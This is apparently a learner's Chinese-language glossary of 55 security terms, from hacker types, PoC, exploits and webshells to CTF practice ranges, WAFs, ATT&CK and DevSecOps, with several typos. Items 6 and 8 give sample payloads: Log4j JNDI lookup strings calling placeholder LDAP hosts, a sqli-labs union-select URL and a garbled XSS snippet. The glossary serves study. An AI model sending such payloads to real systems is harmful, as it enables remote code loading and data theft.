安全术语（自我学习笔记）

 

1、黑客（hacker）---对计算机技术非常擅长的人，窃取数据，破坏计算机系统

2、脚本小子---刚刚入门安全行业，学习了一些技术，指挥使用现成的工具或者从网上复制代码。

3、白帽子---白帽子的目的是发现企业的漏洞并且上报给企业，帮助其解决风险问题（360补天，漏洞盒子，CNVD，CNNVD）

4、红帽黑客---有正义感，爱国的黑客。利用技术维护国家网络安全，并且对外来的攻击进行反击。

5、漏洞(英文vulneability)：

漏洞指的是硬件，软件按协议等等存在的安全缺陷

 

6、POC （Proof of Concept）

能证明漏洞存在的代码
例：S{jndi:ldap://xxxxxx.dnslong.cn/test}

 

7、exp（Exploit--利用）

执行了这一段利用代码之后，就能够达到攻击的目的。

 

8、payload：载荷

①SQL注入(http://localhost/sqli-labs/;ess-3/?id=-1' union select 1,1.database()--+)

②XSS (< >(1)< />) 空格去掉

③log4j ${jndi:ldap://xxxxx/dms;pg.cn/test}

9、0day：使用量非常大的产品被发现 官方还未发布补丁和恢复

10、1day：漏洞被公开但是公布时间段导致还没有大范围的补丁修复

11、Nday漏洞：漏洞公开并且已经过去比较长的时间的漏洞

12、漏扫：基于数据库对漏洞进行自动化扫描 AWVS appscan

13、补丁：patch 漏洞修复程序

14、渗透：pennetration 黑客入侵获取权限的过程

15、渗透测试：pennetration test 授权后的入侵获取权限

16、木马：Trojan house 隐藏在系统中的恶意程序

17、病毒：Virus 恶意代码或程序

18、杀毒软件：瑞星 金山 卡巴斯基 360

19、免杀 ：绕过杀毒软件

20、肉鸡：被黑客获取了控制权限的机器，可能是个人电脑也可能是企业的服务器

21、抓鸡：通过漏洞，自动化的获取肉鸡的行为

22、跳板机：自己的电脑容易被溯源，所以通过肉鸡的电脑进行转接

23、DDOS：Distributed Denial of Service 分布式拒绝服务攻击 发起大量恶意请求，导致正常用户无法访问

24、后门：backdoor 黑客为了对主机进行长期控制，在计算机上种植的一段程序或留下的一个“入口”，木马可能会充当后门

25、中间人攻击 在客户端与服务器之间布置一台黑客的服务器作为中转，从而窃取、篡改用户请求服务信息

26、网络钓鱼 冒充网站，窃取用户的账号密码

27、webshell shell是一种命令执行工具，可以对计算机进行控制asp php jsp之外的代码文件，可以通过这些代码文件可以执行任意的命令，对计算机做任意的操作，分为小马(仅有文件上传功能)、一句话木马，通过一些网站管理工具来连接、大马，一个有可操作界面的木马

28、Getshell 获得执行命令的环境(redis持久化 mysql写文件的功能 mysql的日志记录功能 上传功能 数据备份功能 编辑器)

29、提权 通过漏洞使得自己获取的一个用户权限升级为管理员权限

30、拿站 拿到了最高权限

31、拖库 把网站的全部数据导出了

32、撞库 获取裤子去批量登录其他网站，因为部分人建立账号密码都相同

33、旁站入侵 入侵同服务器的其他网站

34、横向移动 攻击者入侵一台服务器陈恭候，基于内部网络，继续入侵同网段的其他机器

35、代理 Proxy 带我们发起网络请求的一台服务器

36、VPN Virtual Private Network 代理 加密通信 办公-在家里连到公司内网

37、 蜜罐 Honeypot 吸引攻击者攻击的伪装系统，用来实现溯源和反制 免费蜜罐HFish

38、沙箱 Sandbox 沙箱是一种按照安全策略限制程序行为的执行环节，就算用恶意代码，也只能影响沙箱环境而不会影响到操作系统 云沙箱-微步

39、靶场 模拟有漏洞的环境 可以是网站、容器、操作系统等

①web综合靶场-DVWA pikachu bwapp

②web专用靶场-sqli-labs、upload-labs、xss-labs

③漏洞复现靶场-比如CVE 44228

④操作系统靶场-vulnhub

⑤CTF靶场-专门用来联系CTF题目，每个人都有一个独立的环境

40、堡垒机 跳板机 运维审计系统-管理一些资源、用户、虚拟机等

41、WAF Web Application Firewall 网络应用防火墙 对HTTP和HTTPS的流量内容进行分析、拦截恶意攻击行为

42、APT攻击 Advanced Persistent Threat 高级可持续威胁攻击，指某组织在网络上对特定对象展开的持续有效的攻击活动

43、护网 国家组织牵头 组织事业单位，国企单位，名企单位等开展攻防两方的网咯安全演习

 

44、CTF Capture The Flag 夺旗赛 是一种黑客技术竞赛 方向：Reverse Pwn Web Crypto Misc Mobile

在线CTF ：bugku 北京联合大学 CTFHub bmzCTF 攻防世界 CRFHOW

45、CVE Common Vulerablities and Exposures 通用漏洞纰漏，例如CVE-2021-44228 https：//www.cve.cn/

46、CNVD 国家漏洞共享平台

47、应急响应 如何应对网络攻击，包括事前与事后两块措施

48、SRC 企业的应急响应中心，上交后可以获取一些奖励

49、网络空间测绘 类似于网络爬虫收录进数据库中——网络空间搜索引擎 fofa.cn zoomeye.org

50、ATT&CK Adver Tactics Techniques and Common Knowledge 攻击者战术支持库

51、逆向 Reverse 把程序还原为源代码，分析程序的运行过程。

52、DevOps Development+Operations 开发测试运维一体化

53、CICD 持续集成Continuous Integration 持续交付C Delicery 持续部署C Deployment

54、DevSecOps（Development+Security+Operations）

安全开发与运维

55、等保 网络安全等级保护 相关行业的单位和公司的信息系统必须进行